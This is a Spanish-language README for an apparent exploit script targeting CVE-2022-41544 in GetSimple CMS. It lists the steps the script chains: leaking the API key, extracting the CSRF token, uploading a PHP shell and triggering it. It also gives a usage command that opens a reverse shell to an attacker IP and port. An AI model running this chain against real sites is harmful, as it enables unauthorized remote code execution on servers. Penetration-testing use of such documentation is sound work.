
Script de explotación en Python para CVE-2022-41544 en GetSimple CMS. Automatiza la fuga de claves API, la extracción de tokens CSRF, la subida de shells PHP y el disparo de reverse shells para pruebas de penetración.
Este repositorio contiene un script para explotar la vulnerabilidad CVE-2022-41544 en GetSimple CMS. El script realiza varios pasos para verificar vulnerabilidades, filtrar claves API, establecer cookies, obtener tokens CSRF, subir un shell y activar el shell.
telnetlib ya que no era necesaria para la funcionalidad del script.Clonar el Repositorio:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
Instalar Dependencias: Asegúrate de tener Python 3 instalado junto con la librería .
requestspip3 install requests
Ejecutar el Script:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: El dominio o dirección IP del objetivo.<path>: La ruta a la instalación de GetSimple CMS.<ip:port>: La IP y el puerto para la shell reversa.<username>: El nombre de usuario administrador para GetSimple CMS.Ejemplo:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): Muestra un banner estilizado usando arte ASCII.get_version(target, path): Verifica si la versión objetivo de GetSimple CMS es vulnerable.api_leak(target, path): Intenta recuperar una clave API de un archivo XML de autorización.set_cookies(username, version, apikey): Establece las cookies necesarias para solicitudes posteriores basadas en la clave API recuperada.get_csrf_token(target, path, headers): Extrae un token CSRF necesario para subir un shell.upload_shell(target, path, headers, nonce, shell_content): Sube un shell PHP al servidor objetivo.shell_trigger(target, path): Activa el shell subido para establecer una conexión de shell reversa.La función main() orquesta todo el proceso llamando a las funciones anteriores en secuencia para explotar la vulnerabilidad CVE-2022-41544.
Este script fue desarrollado por h3x0v3rl0rd.
Este script se proporciona solo con fines educativos. El acceso no autorizado a sistemas es ilegal y poco ético. Usa este script de manera responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.
Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.